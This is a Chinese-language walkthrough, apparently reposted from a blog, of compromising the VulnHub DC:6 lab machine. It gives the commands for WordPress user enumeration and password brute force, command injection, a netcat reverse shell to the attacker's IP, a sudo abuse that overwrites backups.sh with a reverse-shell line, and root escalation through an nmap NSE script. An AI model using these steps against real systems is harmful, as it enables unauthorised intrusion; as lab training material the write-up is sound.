vulnhub-DC:6靶機滲透記錄


准備工作

在vulnhub官網下載DC:6靶機DC: 6 ~ VulnHub

導入到vmware,設置成NAT模式

打開kali准備進行滲透(ip:192.168.200.6)

 

信息收集

 利用nmap進行ip端口探測

nmap -sS 192.168.200.6/24 

 探測到ip為192.168.200.17的靶機,開放了80端口和22端口

再用nmap對所有端口進行探測,確保沒有別的遺漏信息  

nmap -sV -p- 192.168.200.17

 

先看看80端口,一直打不開,重定向到了wordy,像DC:2的方法一樣操作,修改host文件

vi /etc/hosts

 和dc:2的界面一模一樣框架也是 WordPress

 

 dirsearch掃描也掃到了/wp-login.php后台登陸頁面

 

 接下來和dc:2的操作基本一致

 

wpscan掃描

使用kali自帶的工具wpscan(wordpress框架專門的漏洞掃描工具)列舉出所有用戶  

wpscan --url http://wordy/ -e u 

 

 爆出五個用戶 admin、jens、graham、mark、sarah,保存下來待會進行爆破

但是用了很多字典都爆破不出來,不知道怎么辦的時候才發現在下載地址處的最下面給了線索DC: 6 ~ VulnHub

 

先cd到/usr/share/wordlists/這個目錄,因為rockyou這個文件沒有解壓不能直接打開

gunzip rockyou.txt.gz  

 再返回桌面執行作者給的命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

直接使用wordy進行爆破

wpscan --url http://wordy/ -U user -P passwords.txt

 爆到用戶名mark 密碼helpdesk01

 

nc反彈shell

 登陸到剛剛的后台頁面,在這里找到了命令執行的地方,試了一下127.0.0.1|ls 發現有漏洞可以執行任意命令,那就可以反彈shell到kali上

 

使用nc反彈shell,但是那個框有字數限制,用bp抓一下再放出去就解決了

nc -e /bin/bash 192.168.200.6 9999 

再使用python 通過pty.spawn()獲得交互式shell

python -c'import pty;pty.spawn("/bin/bash")'

 

 

root沒有權限進不去,但是在home里發現了四個用戶,在mark用戶發現了一個txt文件,里面有graham的密碼 GSo7isUM1D4

 

 使用su切換成graham,看看graham的權限

發現jens下的backups.sh可以不用密碼執行,可以用來獲取jens的權限

這里有兩種方法第一種是寫入/bin/bash/,然后以jens的用戶來執行文件直接獲取權限

這里我記錄第二種方法,寫入nc命令,然后在另一端監聽nc -lvf 9999,最后在以jens用戶執行sh文件,再使用python 通過pty.spawn()獲得交互式shell,兩種方法思路都差不多

 

echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh  sudo -u jens /home/jens/backups.sh python -c'import pty;pty.spawn("/bin/bash")'

 

 

在看看jens的權限sudo -l

發現root權限namp無需密碼,利用這個文件提權

 

權限提升

namp有執行腳本的功能,那就可以寫一個執行bash的腳本文件,通過namp執行來提權

echo 'os.execute("/bin/sh")' > getroot.nse   //nes腳本后綴

sudo nmap --script=/home/jens/getroot.nse //namp執行

 

DONE 

 

參考文章

靶機DC-6_sm1rk的博客-CSDN博客

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM